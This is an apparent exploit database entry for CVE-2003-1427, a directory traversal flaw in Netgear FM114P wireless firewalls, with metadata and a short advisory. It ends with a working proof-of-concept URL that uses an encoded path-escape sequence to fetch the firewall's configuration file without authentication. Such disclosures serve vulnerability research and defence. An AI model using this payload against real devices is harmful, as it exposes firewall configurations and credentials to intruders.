Netgear FM114P Wireless Firewall - File Disclosure

Author: stickler
type: remote
platform: hardware
port: 
date_added: 2003-02-10  
date_updated: 2012-10-25  
verified: 1  
codes: CVE-2003-1427;OSVDB-59549  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22236.txt  
source: https://www.securityfocus.com/bid/6807/info

Netgear FM114P Wireless Firewalls allow directory traversal using escaped character sequences. It is possible for an unauthenticated user to retrieve the firewall's configuration file by escaping from the /upnp/service directory.

http://<ip-or-hostname>:<port>/upnp/service/%2e%2e%2fnetgear.cfg